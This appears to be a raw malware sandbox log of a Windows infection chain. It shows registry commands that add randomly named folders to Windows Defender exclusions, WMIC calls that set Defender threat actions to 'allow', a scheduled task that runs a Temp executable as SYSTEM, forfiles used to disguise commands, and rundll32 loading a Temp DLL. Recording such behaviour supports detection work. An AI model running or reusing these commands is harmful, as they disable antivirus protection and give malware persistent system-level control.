C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\STjmdXhOU" /t REG_DWORD /d 0 /reg:643⤵PID:2588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YceypsUXabDXnCzNCPR" /t REG_DWORD /d 0 /reg:323⤵PID:4244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YceypsUXabDXnCzNCPR" /t REG_DWORD /d 0 /reg:643⤵PID:4796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZHcfdgyasGUn" /t REG_DWORD /d 0 /reg:323⤵PID:2912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZHcfdgyasGUn" /t REG_DWORD /d 0 /reg:643⤵PID:4008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gaSWcYIjjvwU2" /t REG_DWORD /d 0 /reg:323⤵PID:4740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gaSWcYIjjvwU2" /t REG_DWORD /d 0 /reg:643⤵PID:4924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\QPFeEjmgnBUOfRVB" /t REG_DWORD /d 0 /reg:323⤵PID:4256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\QPFeEjmgnBUOfRVB" /t REG_DWORD /d 0 /reg:643⤵PID:932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk" /t REG_DWORD /d 0 /reg:323⤵PID:1668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk" /t REG_DWORD /d 0 /reg:643⤵PID:5112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nyFjvKGtfVGLAKAU" /t REG_DWORD /d 0 /reg:323⤵PID:3092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NMbcPgNClKinC" /t REG_DWORD /d 0 /reg:323⤵PID:4812
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NMbcPgNClKinC" /t REG_DWORD /d 0 /reg:643⤵PID:612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\STjmdXhOU" /t REG_DWORD /d 0 /reg:643⤵PID:4548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YceypsUXabDXnCzNCPR" /t REG_DWORD /d 0 /reg:323⤵PID:4008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YceypsUXabDXnCzNCPR" /t REG_DWORD /d 0 /reg:643⤵PID:5072
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZHcfdgyasGUn" /t REG_DWORD /d 0 /reg:643⤵PID:3856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gaSWcYIjjvwU2" /t REG_DWORD /d 0 /reg:323⤵PID:4636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\QPFeEjmgnBUOfRVB" /t REG_DWORD /d 0 /reg:323⤵PID:760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\QPFeEjmgnBUOfRVB" /t REG_DWORD /d 0 /reg:643⤵PID:5080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk" /t REG_DWORD /d 0 /reg:643⤵PID:4460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nyFjvKGtfVGLAKAU" /t REG_DWORD /d 0 /reg:643⤵PID:4832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nyFjvKGtfVGLAKAU" /t REG_DWORD /d 0 /reg:323⤵PID:5072
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk" /t REG_DWORD /d 0 /reg:323⤵PID:2964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gaSWcYIjjvwU2" /t REG_DWORD /d 0 /reg:643⤵PID:4172
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZHcfdgyasGUn" /t REG_DWORD /d 0 /reg:323⤵PID:4924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\STjmdXhOU" /t REG_DWORD /d 0 /reg:323⤵PID:1508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nyFjvKGtfVGLAKAU" /t REG_DWORD /d 0 /reg:643⤵PID:4956
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xsEpqqHAgqAwsAroz" /SC once /ST 00:01:50 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nyFjvKGtfVGLAKAU\PmsBVDuTBNtRlfz\TReCoQk.exe\" za /site_id 668658 /S" /V1 /F2⤵
- Creates scheduled task(s)
PID:4492
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "xsEpqqHAgqAwsAroz"2⤵PID:3644
-
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True1⤵PID:276
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True2⤵PID:3312
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True3⤵PID:2824
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1112 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:4192
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:4544
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding CF5EA486F1B2CE9F9124C7D082AA61A1 C2⤵PID:4740
-
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource core1⤵PID:3704
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True1⤵PID:3556
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True2⤵PID:2288
-
-
C:\Windows\Temp\nyFjvKGtfVGLAKAU\PmsBVDuTBNtRlfz\TReCoQk.exeC:\Windows\Temp\nyFjvKGtfVGLAKAU\PmsBVDuTBNtRlfz\TReCoQk.exe za /site_id 668658 /S1⤵PID:1936
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &2⤵PID:2020
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"3⤵PID:4012
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True4⤵PID:3684
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:4036
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:188
-
-
-
-
-